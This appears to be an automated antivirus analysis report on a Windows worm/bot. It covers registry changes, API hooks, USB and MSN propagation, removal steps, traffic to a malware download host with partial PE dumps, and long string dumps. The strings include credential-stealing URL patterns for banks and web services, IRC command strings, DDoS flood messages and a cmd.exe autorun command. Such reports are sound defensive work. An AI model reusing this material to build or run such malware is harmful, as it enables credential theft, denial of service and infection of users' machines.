"uuid" = "6F 9A 57 53 0A 29 1B 4E BE 6B 6A D9 6F E7 5E 1E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CG1]
"HAL" = "05 EE 00 00"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lgzovpzqe.exe]
"DisableExceptionChainValidation" = ""
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CG1]
"BID" = "20 00 08 00 13 00 06 00 DE 07 00 00 14 00 88 FF"
Dropped PE files
MD5 | File path |
---|---|
830da209ecc9fb980d35ba8d2e61bb27 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bet[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Worm installs the following user-mode hooks in WININET.dll:
HttpSendRequestW
InternetWriteFile
HttpSendRequestA
The Worm installs the following user-mode hooks in DNSAPI.dll:
DnsQuery_A
DnsQuery_W
The Worm installs the following user-mode hooks in WS2_32.dll:
send
GetAddrInfoW
The Worm installs the following user-mode hooks in kernel32.dll:
MoveFileA
CopyFileW
CopyFileA
MoveFileW
CreateFileW
CreateFileA
The Worm installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtResumeThread
NtQueryDirectoryFile
NtEnumerateValueKey
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer.A worm can spread its copies through the MSN Messanger.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ngggg.exe:1096
ngggg.exe:1596
ngggg.exe:912
calc.exe:3372
zthzjntzphj.exe:3036
%original file name%.exe:1984
dqqq.exe:180
vuxrwahifpa.exe:3788
vuxrwahifpa.exe:3272
vuxrwahifpa.exe:2984
bpihytyvgix.exe:2996
sppp.exe:3284
sppp.exe:2528
bett.exe:1580
bett.exe:1672 - Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
%Documents and Settings%\%current user%\Application Data\c731200 (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\c731200 (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe (9505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bett.exe (62128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dq[1].exe (21775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe (12735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\spm[1].exe (43891 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ng[1].exe (33073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bet[1].exe (70237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe (33910 bytes)
%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Uukmkg" = "%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftPerfWD" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\sppp.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.0.10.0
Legal Copyright: Copyright (c) 2000-2004 Oleh Yuschuk
Legal Trademarks:
Original Filename:
Internal Name: OllyDbg
File Version: 1.0.10.0
File Description: OllyDbg, 32-bit analysing debugger
Comments:
Language: Language Neutral
Company Name: Product Name: Product Version: 1.0.10.0Legal Copyright: Copyright (c) 2000-2004 Oleh YuschukLegal Trademarks: Original Filename: Internal Name: OllyDbgFile Version: 1.0.10.0File Description: OllyDbg, 32-bit analysing debuggerComments: Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 40083 | 40448 | 4.52037 | 3968259063d25d635df3bc4a5234b1b8 |
.rdata | 45056 | 14292 | 14336 | 3.63511 | 2ddde80c1d07fe980d71d92932333fc0 |
.data | 61440 | 14180 | 6656 | 4.27116 | b2d13cdfd2b27a256886545f3f3b11c7 |
.rsrc | 77824 | 35156 | 35328 | 4.78522 | 92d80d4490430c356f5bb6edf9e29c21 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://dl.dqwjnewkwefewamail.com/bet.exe | 54.193.9.202 |
hxxp://dl.dqwjnewkwefewamail.com/ng.exe | 54.193.9.202 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /bet.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dl.dqwjnewkwefewamail.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 19 Jun 2014 16:43:30 GMT
Server: Apache/2.2.27 (Amazon)
Last-Modified: Thu, 19 Jun 2014 14:49:25 GMT
ETag: "20f74-4c200-4fc317ba75165"
Accept-Ranges: bytes
Content-Length: 311808
Connection: close
Content-Type: application/octet-stream
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}..............;........d.......d?......d).........u....d9......N.......N>......N;.....Rich....................PE..L......S.............................#....... ....@.........................................................................L...<.......................................................................@............ ...............................text............................... ..`.rdata...z... ...|..................@..@.data....M......."..................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....0.E......E......E.Pjd.4.......E..}..u.h`"A..>..........>....E.3..u...u..M.Q.U.Rh."A............E.P.M.Qh."A..........U.Rh.....E.P.e.......E..M.Q.........U.R.E.Ph.............E..}..u..........M.Q.U.Rh.....E.P.........E..}..u..........M.Q.D......j.h."A.h."A.h."A.h."A.j...."A.......E...A....#A..]....#A..].....E...$....E...$.E.......].....E...$....E...$....E...$h."A..l.......U.3...]...............U......E...$....E...$.,......]..U...............................................................x...
<<
<<< skipped >>>
GET /ng.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dl.dqwjnewkwefewamail.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 19 Jun 2014 16:45:16 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Thu, 19 Jun 2014 13:46:51 GMT
ETag: "603d8-37a00-4fc309be5c8c0"
Accept-Ranges: bytes
Content-Length: 227840
Connection: close
Content-Type: application/octet-stream
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}..............;........d.......d?......d).........s....d9......N.......N>......N;.....Rich....................PE..L......S.....................n.......#....... ....@.........................................................................<...<.......`...............................................................@............ ...............................text............................... ..`.rdata...y... ...z..................@..@.data....M......."..................@....rsrc...`...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....0.E......E......E.Pjd.4.......E..}..u.hP"A..>..........>....E.3..u...u..M.Q.U.Rht"A............E.P.M.Qh."A..........U.Rh.....E.P.e.......E..M.Q.........U.R.E.Ph.............E..}..u..........M.Q.U.Rh.....E.P.........E..}..u..........M.Q.D......j.hq"A.hr"A.hs"A.h."A.j...."A.......E...A....#A..]...."A..].....E...$....E...$.E.......].....E...$....E...$....E...$h."A..l.......U.3...]...............U......E...$....E...$.,......]..U...............................................................x
<<
<<< skipped >>>
Map
The Worm connects to the servers at the folowing location(s):
Strings from Dumps
svchost.exe_884:
.text
.text
`.data
`.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
RPCRT4.dll
RPCRT4.dll
NETAPI32.dll
NETAPI32.dll
ole32.dll
ole32.dll
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
GetProcessHeap
GetProcessHeap
NtOpenKey
NtOpenKey
svchost.pdb
svchost.pdb
\PIPE\
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
svchost.exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
svchost.exe_884_rwx_00090000_00029000:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
*windows defender*
*windows defender*
*windowsupdate*
*windowsupdate*
*drweb*
*drweb*
dwwin.exe
dwwin.exe
kernel32.dll
kernel32.dll
iphlpapi.dll
iphlpapi.dll
GetExtendedTcpTable
GetExtendedTcpTable
GetOwnerModuleFromTcpEntry
GetOwnerModuleFromTcpEntry
%systemroot%
%systemroot%
%programfiles%\Common Files\*\*.exe
%programfiles%\Common Files\*\*.exe
%appdata%\Identities\*.exe
%appdata%\Identities\*.exe
%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe
%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe
ole32.dll
ole32.dll
/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"
/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"
/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"
/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"
%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe
%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe
%SystemRoot%\system32\SHELL32.dll
%SystemRoot%\system32\SHELL32.dll
%s\c731200
%s\c731200
%s\%s
%s\%s
%s\%s.lnk
%s\%s.lnk
Windows_Shared_Mutex_231_c000100
Windows_Shared_Mutex_231_c000100
ntdll.dll
ntdll.dll
\ScreenSaverPro.scr
\ScreenSaverPro.scr
\temp.bin
\temp.bin
user32.dll
user32.dll
advapi32.dll
advapi32.dll
shell32.dll
shell32.dll
urlmon.dll
urlmon.dll
wininet.dll
wininet.dll
gdi32.dll
gdi32.dll
rpcrt4.dll
rpcrt4.dll
netapi32.dll
netapi32.dll
*.exe
*.exe
.gonewiththewings
.gonewiththewings
*.gonewiththewings
*.gonewiththewings
WinExec
WinExec
URLDownloadToFileA
URLDownloadToFileA
http://www.google.com
http://www.google.com
\calc.exe
\calc.exe
\Reader_sl.exe
\Reader_sl.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
notepad.exe
notepad.exe
\notepad.exe
\notepad.exe
\svchost.exe
\svchost.exe
WindowsId
WindowsId
Identities\%s
Identities\%s
%s\%s\%s.exe
%s\%s\%s.exe
:Zone.Identifier
:Zone.Identifier
.quarantined
.quarantined
"%s" -shell
"%s" -shell
"%s" -bind
"%s" -bind
userinit.exe
userinit.exe
explorer.exe
explorer.exe
Windows critical error, require reboot
Windows critical error, require reboot
Windows Update
Windows Update
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyA
RegOpenKeyA
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
SetTcpEntry
SetTcpEntry
SHLWAPI.dll
SHLWAPI.dll
RPCRT4.dll
RPCRT4.dll
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\WindowsId Manager Reader
Software\WindowsId Manager Reader
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\RunOnce
WindowsMark
WindowsMark
m1xg.org
m1xg.org
mxxtxxt.biz
mxxtxxt.biz
meob.me
meob.me
%System%\notepad.exe
%System%\notepad.exe
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0A
tlSSSSSSSSSShL0A
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
%s_%d
%s_%d
-%sMutex
-%sMutex
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
[%s{%s%s{%s
[%s{%s%s{%s
n%s[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
\\.\%c:
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
URLDownloadToFileW
URLDownloadToFileW
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
SSRR %s 0 0 :%s
KCIK %s
KCIK %s
SEND %s %s
SEND %s %s
PART %s
PART %s
PPPPMSG %s :%s
PPPPMSG %s :%s
QUIT :%s
QUIT :%s
PPNG %s
PPNG %s
PPPPMSG
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
{A5DCBF10-6530-11D2-901F-00C04FB951ED}
{A5DCBF10-6530-11D2-901F-00C04FB951ED}
shlwapi.dll
shlwapi.dll
crypt32.dll
crypt32.dll
wtsapi32.dll
wtsapi32.dll
samcli.dll
samcli.dll
netutils.dll
netutils.dll
userenv.dll
userenv.dll
WindowsSecondaryDesktop
WindowsSecondaryDesktop
\charmap.exe
\charmap.exe
\Windows Media Player\wmprph.exe
\Windows Media Player\wmprph.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe
%s\Identities\%s.exe
%s\Identities\%s.exe
\\.\pipe
\\.\pipe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
